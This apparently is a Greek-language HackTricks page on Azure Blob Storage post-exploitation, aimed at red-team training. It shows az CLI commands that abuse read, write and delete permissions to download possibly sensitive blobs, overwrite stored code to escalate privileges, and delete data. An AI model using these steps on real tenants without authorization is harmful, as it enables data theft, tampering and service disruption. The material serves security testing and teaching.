Az - Blob Storage Post Exploitation

Tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Μάθετε & εξασκηθείτε στο Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks

Storage Privesc

Για περισσότερες πληροφορίες σχετικά με την αποθήκευση, ελέγξτε:

Az - Storage Accounts & Blobs

Microsoft.Storage/storageAccounts/blobServices/containers/blobs/read

Ένας κύριος με αυτή την άδεια θα μπορεί να καταγράψει τα blobs (αρχεία) μέσα σε ένα κοντέινερ και να κατεβάσει τα αρχεία που μπορεί να περιέχουν ευαίσθητες πληροφορίες.

# e.g. Microsoft.Storage/storageAccounts/blobServices/containers/blobs/read
az storage blob list \
--account-name <acc-name> \
--container-name <container-name> --auth-mode login

az storage blob download \
--account-name <acc-name> \
--container-name <container-name> \
-n file.txt --auth-mode login

Microsoft.Storage/storageAccounts/blobServices/containers/blobs/write

Ένας χρήστης με αυτή την άδεια θα μπορεί να γράψει και να αντικαταστήσει αρχεία σε κοντέινερ που μπορεί να του επιτρέψει να προκαλέσει κάποια ζημιά ή ακόμα και να κλιμακώσει τα δικαιώματα (π.χ. να αντικαταστήσει κάποιον κωδικό που είναι αποθηκευμένος σε ένα blob):

# e.g. Microsoft.Storage/storageAccounts/blobServices/containers/blobs/write
az storage blob upload \
--account-name <acc-name> \
--container-name <container-name> \
--file /tmp/up.txt --auth-mode login --overwrite

*/delete

Αυτό θα επέτρεπε τη διαγραφή αντικειμένων μέσα στον λογαριασμό αποθήκευσης, κάτι που θα μπορούσε να διακόψει ορισμένες υπηρεσίες ή να κάνει τον πελάτη να χάσει πολύτιμες πληροφορίες.

Tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Μάθετε & εξασκηθείτε στο Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks